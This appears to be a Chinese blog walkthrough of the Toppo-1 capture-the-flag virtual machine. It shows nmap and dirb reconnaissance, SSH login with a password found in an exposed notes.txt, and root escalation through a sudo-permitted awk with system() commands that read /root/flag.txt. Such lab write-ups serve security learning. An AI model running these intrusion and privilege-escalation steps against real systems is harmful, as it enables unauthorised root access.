toppo-1
2024-09-03 12:57:32
靶机准备
由于是.vmdk文件,新建一个虚拟机把硬盘移除,在将此vmdk文件添加为新硬盘即。
开机发现给出了ip地址:192.168.164.184,且当前网络模式为NAT
将kali也设置为NAT模式即可
kali:192.168.164.137
渗透测试
nmap扫描一下端口
nmap -sS -sV -T5 -A -p- 192.168.164.184
用dirb扫目录,
dirb http://192.168.164.184
扫描到了很多目录,先进admin目录,发现一个notes.txt文件
打开查看
里面的12345ted123好像是密码,尝试ssh连接
用户名猜测为ted,成功连接
查看不是root权限,尝试提权
首先使用sudo -l,发现用不了,用cat /etc/sudoers发现ted 目前可以已root权限运行/usr/bin/awk程序
sudo -l=当前用户可以已root身份执行的操作
cat /etc/sudoers=谁被允许已root身份执行
直接使用awk的权限读取flag
awk 'BEGIN{system("whoami")}'
awk 'BEGIN{system("ls /root")}'
awk 'BEGIN{system("cat /root/flag.txt")}'
最新文章
- [codevs1001]舒适的路线
- 8月17日 Power-BI关于全国房地产开发投资情况分析 QQ群视频交流开课啦
- Linux vi 中移动光标 命令
- DW(三):polybase基本理论
- 【POJ】【1821】Fence
- 文本替换sed+字段处理cut,join+awk重新编排字段
- 在Eclipse下debug 出现Source not found for ...
- 今日吐槽20151208.net服务器控件
- WP8.1开发系列之隐藏顶部状态栏
- C语言之if和switch的分别
- MUI框架开发HTML5手机APP(一)--搭建第一个手机APP
- OS + CentOS / http_proxy / https_proxy / dalishangwang / repo
- Perl的数值和字符串
- Android 常用数据操作封装类案例
- Deepin 15.4 挂载分区
- (一)从设计的角度来看ADT(Java)
- StringBuffer类和String类(原文地址 : http://www.cnblogs.com/springcsc/archive/2009/12/03/1616330.html)
- stack堆栈容器、queue队列容器和priority_queue优先队列容器(常用的方法对比与总结)
- How to calculate elapsed / execute time in Java
- Qt之QLocalSocket